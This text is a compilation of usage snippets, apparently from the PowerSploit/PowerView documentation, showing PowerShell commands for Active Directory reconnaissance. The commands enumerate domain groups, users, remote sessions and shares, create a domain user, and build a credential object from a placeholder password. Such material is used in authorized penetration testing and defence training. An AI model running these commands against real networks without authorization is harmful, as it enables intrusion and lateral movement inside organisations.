Get-DomainSID ``` -------------------------------- ### Authenticate with Credentials and Get Domain Groups Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-DomainGroup.md Demonstrates how to create a secure credential object and use it with Get-DomainGroup to query groups when specific authentication is required. This is useful for running the cmdlet in environments with non-default credentials. ```powershell $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) Get-DomainGroup -Credential $Cred ``` -------------------------------- ### Get Domain by Name Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-Domain.md Use this to retrieve the domain object for a specific domain name. ```powershell Get-Domain -Domain testlab.local ``` -------------------------------- ### Create New Domain User Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/New-DomainUser.md Creates a new domain user with a specified SAM account name, description, and password. ```powershell New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword ``` -------------------------------- ### Get Credentials Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Add-RemoteConnection.md Obtain user credentials for authentication. This is a prerequisite for establishing remote connections. ```powershell $Cred = Get-Credential ``` -------------------------------- ### Export Domain User Data to CSV Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Export-PowerViewCSV.md This example demonstrates how to export all domain user objects to a CSV file named 'users.csv'. The output will overwrite the file if it already exists. ```powershell Get-DomainUser | Export-PowerViewCSV -Path "users.csv" ``` -------------------------------- ### Get Remote Sessions Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-NetSession.md Use this snippet to retrieve active sessions from a specified remote host. ```powershell Get-NetSession -ComputerName sqlserver ``` -------------------------------- ### Get Shares on Local Host Source: https://github.com/powershellmafia/powersploit/blob/master/docs/Recon/Get-NetShare.md Execute this command to retrieve all active shares on the local machine. ```powershell Get-NetShare ```